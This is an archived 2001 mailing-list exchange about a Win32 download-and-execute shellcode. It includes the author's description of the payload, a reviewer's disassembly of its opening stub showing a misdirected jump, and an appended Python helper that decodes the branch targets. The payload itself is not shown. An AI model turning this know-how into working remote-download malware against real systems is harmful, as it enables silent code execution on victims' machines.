Vulnerability Development mailing list archives

AW: GENERIC Win32 Shellcode


From: "Der HexXer" <DerHexXer () gmx net>
Date: Mon, 20 Aug 2001 06:56:45 +0200

I am sending a generic Win32 shellcode as an attachment. It has a size of 800 bytes
and has an editable URL line. It must point to an exe on the Internet. The
shellcode will download it and execute it. It runs on Windows
95/98/ME/NT/2000 and XP. The file to download has a limit of 2.2 MB. If
someone can test the shellcode, please send me an email with comments on it.

Why do you have a relative jump to [ShellCode-Entry] - 7 bytes
at the beginning of your code?
(The first jump should be EIP+11 bytes: \xEB\x0B\x...)

Debug: (added 4 nops; entry: 00401000)
  00401003 90                   nop
  00401004 EB F7                jmp         00400FFD ;???
  00401006 8D 76 17             lea         esi,[esi+17h]
  00401009 8B FC                mov         edi,esp
  0040100B 8B D7                mov         edx,edi
  0040100D F3 A4                rep movs    byte ptr [edi],byte ptr [esi]
  0040100F 52                   push        edx
  00401010 C3                   ret
  00401011 EB 30                jmp         00401043 ;eip should jump to this address
 ;00401228 E8 E6 FD FF FF       call        00401013
=>00401013 5F                   pop         edi
  ...

Der HexXer.
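As an added illustration (not code from the original post or its shellcode), the following decodes the rel8/rel32 displacements quoted in the debug listing above and reproduces the target addresses the reviewer arrived at, including the suggested EB 0B encoding; the listing bytes are copied from the post, and `branch_target` / `short_jmp_for` are helper names chosen here.

```python
# Added example: decode x86 relative branches from the listing in the post.
# A rel8/rel32 displacement is relative to the address of the NEXT instruction,
# which is why an EB F7 at 00401004 lands 7 bytes before the shellcode entry.
import struct

def branch_target(addr: int, opcode_bytes: bytes) -> int:
    """Absolute target of a short JMP (EB rel8) or near CALL/JMP (E8/E9 rel32)
    whose first byte sits at `addr`."""
    op = opcode_bytes[0]
    if op == 0xEB:                        # JMP rel8, 2-byte instruction
        disp = struct.unpack("<b", opcode_bytes[1:2])[0]
        return (addr + 2 + disp) & 0xFFFFFFFF
    if op in (0xE8, 0xE9):                # CALL/JMP rel32, 5-byte instruction
        disp = struct.unpack("<i", opcode_bytes[1:5])[0]
        return (addr + 5 + disp) & 0xFFFFFFFF
    raise ValueError(f"not a relative branch: {opcode_bytes.hex()}")

def short_jmp_for(addr: int, target: int) -> bytes:
    """Encode the EB rel8 needed at `addr` to land exactly on `target`."""
    disp = target - (addr + 2)
    if not -128 <= disp <= 127:
        raise ValueError("target out of rel8 range")
    return bytes([0xEB]) + struct.pack("<b", disp)

# Branch instructions quoted in the debug listing (address, raw bytes).
LISTING = [
    (0x00401004, bytes.fromhex("EBF7")),        # jmp 00400FFD ;???
    (0x00401011, bytes.fromhex("EB30")),        # jmp 00401043
    (0x00401228, bytes.fromhex("E8E6FDFFFF")),  # call 00401013
]

def decode_listing() -> dict:
    """Map each branch address in LISTING to its decoded target."""
    return {addr: branch_target(addr, raw) for addr, raw in LISTING}

if __name__ == "__main__":
    for addr, tgt in decode_listing().items():
        print(f"{addr:08X} -> {tgt:08X}")
    # The reviewer's proposed fix: from 00401004, reach 00401011 (EIP+11).
    print("fix:", short_jmp_for(0x00401004, 0x00401011).hex())
```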

